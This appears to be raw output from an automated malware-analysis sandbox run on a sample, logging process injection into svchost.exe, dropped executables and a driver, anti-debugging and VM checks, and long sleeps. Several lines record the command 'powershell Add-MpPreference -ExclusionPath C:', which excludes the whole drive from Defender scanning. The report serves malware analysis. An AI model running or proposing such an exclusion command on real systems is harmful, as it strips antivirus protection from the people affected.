                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C48DE00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,5_2_000002684C48DE00
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3731Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6013Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8292Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1283Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7300Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2247Jump to behavior
                    Source: C:\Windows\System32\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_5-19650
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeDropped PE file which has not been started: C:\Windows\Temp\K47ZW3T_7928.sysJump to dropped file
                    Source: C:\Users\user\Desktop\UZPt0hR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-10725
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI coverage: 6.6 %
                    Source: C:\Windows\System32\svchost.exeAPI coverage: 8.0 %
                    Source: C:\Windows\System32\svchost.exe TID: 1440Thread sleep count: 47 > 30Jump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 1440Thread sleep time: -141000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 6980Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep count: 3731 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep count: 6013 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7008Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4797F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,5_2_000002684C4797F0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008235CC FindFirstFileA,FindNextFileA,FindClose,15_2_008235CC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00841C54 __doserrno,_errno,_errno,__doserrno,FindFirstFileA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,15_2_00841C54
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007D5BCC GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,15_2_007D5BCC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: w32tm.exe, 00000012.00000002.1501190118.00000000004C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
                    Source: svchost.exe, 00000005.00000002.2446911674.000002684AA99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000005.00000002.2446911674.000002684AA99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP TCPv6 Service Provider
                    Source: svchost.exe, 00000005.00000002.2446684624.000002684AA7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 00000005.00000002.2446368757.000002684AA33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                    Source: UZPt0hR.exe, 00000000.00000002.1217880005.0000000000915000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1474919843.0000000000533000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: svchost.exe, 00000005.00000002.2446684624.000002684AA64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI call chain: ExitProcess graph end nodegraph_0-10682
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI call chain: ExitProcess graph end nodegraph_0-10739
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI call chain: ExitProcess graph end nodegraph_0-10736
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI call chain: ExitProcess graph end nodegraph_0-10730
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI call chain: ExitProcess graph end nodegraph_0-10748
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI call chain: ExitProcess graph end nodegraph_0-10726
                    Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_5-19612
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeAPI call chain: ExitProcess graph end nodegraph_15-53224
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeAPI call chain: ExitProcess graph end nodegraph_15-53188
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_005020A6 rdtsc 0_2_005020A6
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C49C5E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000002684C49C5E0
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C48DE00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,5_2_000002684C48DE00
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C488830 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,5_2_000002684C488830
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_0066D47C mov ecx, dword ptr fs:[00000030h]0_2_0066D47C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00849204 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,15_2_00849204
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C49E5B8 SetUnhandledExceptionFilter,5_2_000002684C49E5B8
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C49C5E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000002684C49C5E0
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4A0E94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000002684C4A0E94
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C49A818 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000002684C49A818
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0083C280 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0083C280
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0083C540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0083C540
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00839924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00839924
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00839B18 SetUnhandledExceptionFilter,15_2_00839B18

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\System32\svchost.exeFile created: tzutil.exe.5.drJump to dropped file
                    Source: C:\Users\user\Desktop\UZPt0hR.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                    Source: C:\Users\user\Desktop\UZPt0hR.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_00406DB0 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,_memset,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,0_2_00406DB0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtProtectVirtualMemory: Direct from: 0x1402EF4A5Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtQuerySystemInformation: Direct from: 0x1402FD4DBJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtQuerySystemInformation: Direct from: 0x14030DE30Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtProtectVirtualMemory: Direct from: 0x1400026B1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtProtectVirtualMemory: Direct from: 0x140248445Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtQuerySystemInformation: Direct from: 0x14031CF25Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtProtectVirtualMemory: Direct from: 0x140177DE3Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtProtectVirtualMemory: Direct from: 0x1402538C4Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtProtectVirtualMemory: Direct from: 0x1402EF4ACJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtProtectVirtualMemory: Direct from: 0x140225E44Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtQuerySystemInformation: Direct from: 0x140232AC0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtProtectVirtualMemory: Direct from: 0x14022B9FEJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtQuerySystemInformation: Direct from: 0x140166C45Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtQuerySystemInformation: Direct from: 0x1402FB49EJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtQuerySystemInformation: Direct from: 0x140239FF3Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtQuerySystemInformation: Direct from: 0x1402412BCJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtProtectVirtualMemory: Direct from: 0x140168DD1Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtProtectVirtualMemory: Direct from: 0x140328F65Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtQuerySystemInformation: Direct from: 0x1403071A7Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtProtectVirtualMemory: Direct from: 0x1404215FBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtQuerySystemInformation: Direct from: 0x14029D239Jump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: NULL target: C:\Windows\System32\svchost.exe protection: read writeJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: NULL target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: NULL target: C:\Windows\System32\svchost.exe protection: read writeJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_004043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_004043D0
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_004044A0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_004044A0
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4742E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,5_2_000002684C4742E0
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4743D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,5_2_000002684C4743D0
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C47A3B0 setsockopt,SetEvent,LocalAlloc,wnsprintfW,LocalAlloc,lstrcpyW,LocalAlloc,lstrcpyW,CoInitializeEx,ShellExecuteExW,GetLastError,CoUninitialize,LocalAlloc,wnsprintfW,CreateProcessW,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,shutdown,closesocket,5_2_000002684C47A3B0
                    Source: C:\Users\user\Desktop\UZPt0hR.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """Jump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_0040CF50 AllocateAndInitializeSid,_memset,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,0_2_0040CF50
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_0041D480 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0041D480
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: ___crtGetLocaleInfoEx,WSACreateEvent,___crtGetLocaleInfoEx,WSAGetLastError,WSAEventSelect,WSAWaitForMultipleEvents,WSAEnumNetworkEvents,0_2_00421A20
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: ___crtGetLocaleInfoEx,WSACreateEvent,___crtGetLocaleInfoEx,WSAGetLastError,WSAEventSelect,WSAWaitForMultipleEvents,WSAEnumNetworkEvents,0_2_00421DA0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: GetLocaleInfoA,15_2_0083E5E8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
